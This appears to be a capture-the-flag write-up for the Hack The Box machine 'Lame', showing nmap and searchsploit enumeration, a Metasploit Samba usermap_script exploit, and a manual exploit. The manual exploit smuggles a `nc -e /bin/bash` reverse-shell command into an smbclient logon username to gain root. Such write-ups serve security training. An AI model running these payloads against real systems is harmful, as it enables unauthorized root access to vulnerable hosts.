Metadata
IP: 10.129.77.236
Difficulty: Easy
Summary
This machine has vulnerable samba version which can be exploited to directly get the root access on the machine. In this post we exploited this vulnerability manually and with the use of metasploit as well.
Enumeration
Nmap
We start off by running an nmap scan:
└─$ sudo nmap -sC -sV -oA nmap/initial 10.129.77.236
Starting Nmap 7.92 ( https://nmap.org ) at 2022-06-22 17:50 EDT
Nmap scan report for 10.129.77.236
Host is up (0.11s latency).
Not shown: 996 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
| STAT:
| FTP server status:
| Connected to 10.10.14.55
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| vsFTPd 2.3.4 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey:
| 1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_ 2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
| smb-security-mode:
| account_used: <blank>
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
|_smb2-time: Protocol negotiation failed (SMB2)
| smb-os-discovery:
| OS: Unix (Samba 3.0.20-Debian)
| Computer name: lame
| NetBIOS computer name:
| Domain name: hackthebox.gr
| FQDN: lame.hackthebox.gr
|_ System time: 2022-06-22T17:51:29-04:00
|_clock-skew: mean: 2h00m15s, deviation: 2h49m43s, median: 14s
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 60.17 seconds
Port 21
From the nmap results we found ftp version. We started running serchsploit to look for any known vulnerabilities against the version.
└─$ searchsploit vsftpd 2.3.4
--------------------------------------------------------- ----------------------
Exploit Title | Path
--------------------------------------------------------- ----------------------
vsftpd 2.3.4 - Backdoor Command Execution | unix/remote/49757.py
vsftpd 2.3.4 - Backdoor Command Execution (Metasploit) | unix/remote/17491.rb
--------------------------------------------------------- ----------------------
Shellcodes: No Results
Port 445
From the nmap scan we saw that "Samba 3.0.20-Debian" is running on the machine. We ran searchsploit against it to look for any known vulnerabilities against it.
└─$ searchsploit Samba 3.0.20-Debian
---------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
---------------------------------------------------------------------------------------------------- ---------------------------------
Samba 3.0.10 < 3.3.5 - Format String / Security Bypass | multiple/remote/10095.txt
Samba 3.0.20 < 3.0.25rc3 - 'Username' map script' Command Execution (Metasploit) | unix/remote/16320.rb
Samba < 3.0.20 - Remote Heap Overflow | linux/remote/7701.txt
Samba < 3.6.2 (x86) - Denial of Service (PoC) | linux_x86/dos/36741.py
---------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Resultsn
Exploitation
vsftpd 2.3.4
I tried executing the exploits we found from searchsploit but it failed.
msf6 > search vsftpd 2.3.4 - Backdoor Command Execution
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/unix/ftp/vsftpd_234_backdoor 2011-07-03 excellent No VSFTPD v2.3.4 Backdoor Command Execution
Interact with a module by name or index. For example info 0, use 0 or use exploit/unix/ftp/vsftpd_234_backdoor
msf6 > use exploit/unix/ftp/vsftpd_234_backdoor
[*] No payload configured, defaulting to cmd/unix/interact
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > show options
Module options (exploit/unix/ftp/vsftpd_234_backdoor):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RPORT 21 yes The target port (TCP)
Payload options (cmd/unix/interact):
Name Current Setting Required Description
---- --------------- -------- -----------
Exploit target:
Id Name
-- ----
0 Automatic
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set RHOSTS 10.129.77.236
RHOSTS => 10.129.77.236
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > exploit
[*] 10.129.77.236:21 - Banner: 220 (vsFTPd 2.3.4)
[*] 10.129.77.236:21 - USER: 331 Please specify the password.
[*] Exploit completed, but no session was created.
msf6 exploit(unix/ftp/vsftpd_234_backdoor) >
Samba 3.0.20-Debian
We found exploit for vulnerable version on metasploit. We set necessary options and run the exploit. It opened up root shell on vulnerable machine.
msf6 exploit(multi/samba/usermap_script) > set rhosts 10.129.77.236
rhosts => 10.129.77.236
msf6 exploit(multi/samba/usermap_script) > set lhost 10.10.14.55
lhost => 10.10.14.55
msf6 exploit(multi/samba/usermap_script) > exploit
[*] Started reverse TCP handler on 10.10.14.55:4444
[*] Command shell session 1 opened (10.10.14.55:4444 -> 10.129.77.236:46945 ) at 2022-06-22 19:27:38 -0400
shell
[*] Trying to find binary 'python' on the target machine
[*] Found python at /usr/bin/python
[*] Using `python` to pop up an interactive shell
[*] Trying to find binary 'bash' on the target machine
[*] Found bash at /bin/bash
id
id
uid=0(root) gid=0(root)
root@lame:/#
Manual Exploitation (Without Metasploit)
We started looking for available services on the server using smbclient.
└─$ smbclient -L 10.129.77.236
Enter WORKGROUP\kali's password:
Anonymous login successful
Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
tmp Disk oh noes!
opt Disk
IPC$ IPC IPC Service (lame server (Samba 3.0.20-Debian))
ADMIN$ IPC IPC Service (lame server (Samba 3.0.20-Debian))
Reconnecting with SMB1 for workgroup listing.
Anonymous login successful
Server Comment
--------- -------
Workgroup Master
--------- -------
WORKGROUP LAME
We have access to the tmp directory through anonymous login. After accessing tmp directory we use help command to see what we can do from the shell.
└─$ smbclient //10.129.77.236/tmp
Enter WORKGROUP\kali's password:
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> help
? allinfo altname archive backup
blocksize cancel case_sensitive cd chmod
chown close del deltree dir
du echo exit get getfacl
geteas hardlink help history iosize
lcd link lock lowercase ls
l mask md mget mkdir
more mput newer notify open
posix posix_encrypt posix_open posix_mkdir posix_rmdir
posix_unlink posix_whoami print prompt put
pwd q queue quit readlink
rd recurse reget rename reput
rm rmdir showacls setea setmode
scopy stat symlink tar tarmode
timeout translate unlock volume vuid
wdel logon listconnect showconnect tcon
tdis tid utimes logoff ..
!
smb: \>
We can use logon to get reverse connection to our local machine. To do that we will set up listener on our local machine using below command:
└─$ nc -lnvp 4455
listening on [any] 4455 ...
We used this command to get a reverse shell through smb:
logon "./=`nohup nc -e /bin/bash <IP> <port>`"
smb: \> logon "./=`nohup nc -e /bin/bash 10.10.14.55 4455`"
Password:
session setup failed: NT_STATUS_IO_TIMEOUT
smb: \>
We got a reverse connection to our netcat listener.
└─$ nc -lnvp 4455
listening on [any] 4455 ...
connect to [10.10.14.55] from (UNKNOWN) [10.129.77.236] 54530
id
uid=0(root) gid=0(root)
Proof
Use following command for this section:
root@lame:/root# hostname && whoami && cat root.txt && ip a
hostname && whoami && cat root.txt && ip a
lame
root
646[...]
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 16436 qdisc noqueue
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast qlen 1000
link/ether 00:50:56:96:bc:a9 brd ff:ff:ff:ff:ff:ff
inet 10.129.77.236/16 brd 10.129.255.255 scope global eth0
inet6 dead:beef::250:56ff:fe96:bca9/64 scope global dynamic
valid_lft 86398sec preferred_lft 14398sec
inet6 fe80::250:56ff:fe96:bca9/64 scope link
valid_lft forever preferred_lft forever
root@lame:/root#